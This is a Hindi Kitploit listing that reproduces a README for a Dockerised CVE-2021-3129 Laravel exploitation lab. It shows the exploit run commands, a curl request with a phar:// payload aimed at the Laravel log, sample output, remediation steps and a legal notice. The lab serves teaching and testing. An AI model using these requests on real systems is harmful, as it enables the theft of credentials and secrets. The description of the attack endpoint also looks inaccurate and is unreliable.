Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel डीबग मोड RCE - Python एक्सप्लॉइट, Docker कंटेनर और सुरक्षा विश्लेषण गाइड के साथ संपूर्ण शोषण प्रयोगशाला। | Kitploit
उपकरण/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel डीबग मोड RCE - Python एक्सप्लॉइट, Docker कंटेनर और सुरक्षा विश्लेषण गाइड के साथ संपूर्ण शोषण प्रयोगशाला।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

CVE-2021-3129: Laravel डीबग मोड RCE लैब

License: MIT Python 3.8+ Docker CVSS: 7.5

CVE-2021-3129 के शोषण के लिए व्यावहारिक लैब - एक गंभीर Laravel भेद्यता जो बिना प्रमाणीकरण के फ़ाइल पठन और संभावित RCE की अनुमति देती है।

त्वरित प्रारंभ

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

CVE-2021-3129 क्या है?

यह कैसे काम करता है

  1. टोह - डीबग मोड सक्षम वाले Laravel की पहचान करें
  2. सत्यापन - /_ide_helper.php एंडपॉइंट का परीक्षण करें
  3. शोषण - फ़ाइलें पढ़ने के लिए phar:// रैपर का उपयोग करें
  4. प्रभाव - क्रेडेंशियल्स, API कुंजियाँ, एनवायरनमेंट वेरिएबल्स निकालें

पूर्वापेक्षाएँ

  • Docker Desktop
  • Python 3.8+
  • 4GB RAM

सेटअप (चरण दर चरण)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

अपेक्षित आउटपुट

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

एक्सप्लॉइट का उपयोग

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

मैन्युअल परीक्षण

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

उपचार

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

सफाई

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

अक्सर पूछे जाने वाले प्रश्न

प्र: क्या मैं इंटरनेट पर परीक्षण कर सकता हूँ?
उ: नहीं। यह केवल localhost के लिए है। कभी भी उन सिस्टम पर परीक्षण न करें जिनके मालिक आप नहीं हैं।

प्र: क्या यह पैच किए गए संस्करणों पर काम करेगा?
उ: नहीं। Laravel 8.4.2+ और 7.30.4+ पैच किए जा चुके हैं।

प्र: क्या मैं एक्सप्लॉइट को संशोधित कर सकता हूँ?
उ: हाँ। सीखने के उद्देश्य से कोड पूरी तरह टिप्पणीयुक्त है।

प्र: नेटवर्क ट्रैफ़िक कैसे कैप्चर करें?
उ: tcpdump या Wireshark का उपयोग करें:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

कानूनी सूचना

⚠️ केवल शैक्षिक उद्देश्यों के लिए

✅ अधिकृत उपयोग:

  • शैक्षिक अध्ययन
  • अधिकृत सुरक्षा परीक्षण
  • रक्षात्मक अनुसंधान

❌ निषिद्ध उपयोग:

  • अनधिकृत सिस्टम पहुँच
  • अवैध हैकिंग
  • सिस्टम को नुकसान

केवल उन्हीं सिस्टम पर उपयोग करें जिनके मालिक आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।

संसाधन

  • CVE-2021-3129
  • Laravel सुरक्षा
  • PHP रैपर

लेखक

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • स्थान: बेंगलुरु, कर्नाटक, भारत

लाइसेंस

MIT लाइसेंस - LICENSE फ़ाइल देखें

टूल डाउनलोड करें
विशेषताविवरण
गंभीरताCVSS 7.5 (उच्च)
प्रभावितLaravel < 8.4.2, < 7.30.4
प्रभावमनमानी फ़ाइल पठन, जानकारी का रिसाव, संभावित RCE
प्रमाणीकरण आवश्यकनहीं
हमला वेक्टरनेटवर्क